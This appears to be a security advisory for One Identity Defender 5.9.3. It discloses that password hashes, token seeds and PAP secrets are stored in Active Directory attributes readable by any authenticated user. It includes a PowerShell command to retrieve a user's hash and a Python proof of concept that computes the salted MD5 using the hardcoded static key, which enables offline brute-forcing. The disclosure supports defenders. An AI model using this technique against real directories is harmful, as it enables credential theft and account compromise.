One Identity Defender 5.9.3 Insecure Cryptographic Storage

2019.09.05
Credit: spicyitalian
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: One Identity Defender - Insecure Cryptographic Storage Date: 01 September 2019 Affected Software: ================== One Identity Defender 5.9.3 Other versions are likely also vulnerable. Insecure Cryptographic Storage: ============================== Defender stores token seeds, PAP secrets, and user passwords in Active Directory attributes that are readable by all authenticated users. Defender passwords are hashed using MD5 in conjunction with a static key for obfuscation which allows the computed hash to be read from the defender-userTokenData attribute in Active Directory and then used in an offline brute force attack. Hash Retrieval: PS C:\Users\Duras> Get-ADUser Martok -Properties * | Select DistinguishedName, ObjectGUID, defender-userTokenData DistinguishedName ObjectGUID defender-userTokenData ----------------- ---------- ---------------------- CN=Martok,CN=Users,DC=QonoS,DC=local 52126f3a-723d-4b7e-a6ae-ccc2279e8618 {B:144:0505D1F541F69C63315DD85FBBDB7B4DC9E500000000000000000000000000000000000000000000000000000000000000000000000... Hash Calculation: #!/usr/bin/env python3 import binascii import hashlib guid = '52126f3a-723d-4b7e-a6ae-ccc2279e8618' password = 'secret' key = '45f88b08118bf03b8d55e452f77c2e8b' guid = binascii.unhexlify(guid.translate(str.maketrans('', '', '-'))) guid = binascii.unhexlify(b''.join(map(binascii.hexlify, (guid[3::-1], guid[5:3:-1], guid[7:5:-1], guid[8:])))) password = ('\00'.join([password[i:i+1] for i in range(0, len(password)+1, 1)])).encode() hash = binascii.unhexlify(key) + password + guid print (hashlib.md5(hash).hexdigest()) [duras@qonos ~]$ ./hash.py d1f541f69c63315dd85fbbdb7b4dc9e5 Contact: ======== spicyitalian[at]protonmail[dot]com


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top